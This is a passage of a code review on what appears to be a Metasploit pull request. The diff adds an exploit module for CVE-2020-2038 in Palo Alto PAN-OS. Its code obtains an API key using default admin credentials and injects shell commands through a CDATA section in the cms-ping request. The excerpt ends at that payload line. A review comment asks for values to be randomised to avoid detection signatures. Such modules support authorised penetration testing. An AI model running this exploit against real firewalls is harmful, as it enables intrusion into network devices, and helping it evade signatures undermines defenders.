modules/exploits/linux/http/panos_auth_rce.rb

```diff
@@ -0,0 +1,140 @@
+
+          PAN-OS 9.1 versions earlier than 9.1.4;
+
+          PAN-OS 10.0 versions earlier than 10.0.1.
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov and Nikita Abramov', # Vulnerability discovery
+          'UnD3sc0n0c1d0',                          # Exploit
+          'jheysel-r7'                              # msf module
+        ],
+        'References' => [
+          ['CVE', '2020-2038'],
+          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
+          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038']
+        ],
+        'DisclosureDate' => '2020-09-09',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux x86',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+              'CmdStagerFlavor' => %i[echo printf]
+            }
+          ],
+          [
+            'Linux x86_64',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => %i[echo printf]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 2 },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('USERNAME', [false, 'PAN-OS username', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
+      ]
+    )
+  end
+
+  def api_key
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/'),
+      'vars_get' => {
+        'type' => 'keygen',
+        'user' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+
+    if res.nil?
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+
+    if res.code == 401
+      fail_with(Failure::NoAccess, 'Server returned HTTP status 401 - Authentication failed')
+    end
+
+    if res.code == 403
+      fail_with(Failure::NoAccess, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"')
+    end
+
+    if res.body.blank?
+      fail_with(Failure::UnexpectedReply, 'Empty reply from server')
+    end
+
+    xml = Nokogiri::XML(res.body)
+    key = xml.xpath('/response/result/key').text
+    print_good('Successfully obtained api key')
+
+    if key.nil?
+      fail_with(Failure::UnexpectedReply, 'Empty reply from server')
+    end
+
+    key
+  end
+
+  def execute_command(cmd, opts = {})
+    payload = "<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
```

Comment:
Can we randomize some of these values at all? Otherwise this might be fairly easy to signature.

Reply:
I'll see what can be randomized here, good call 👍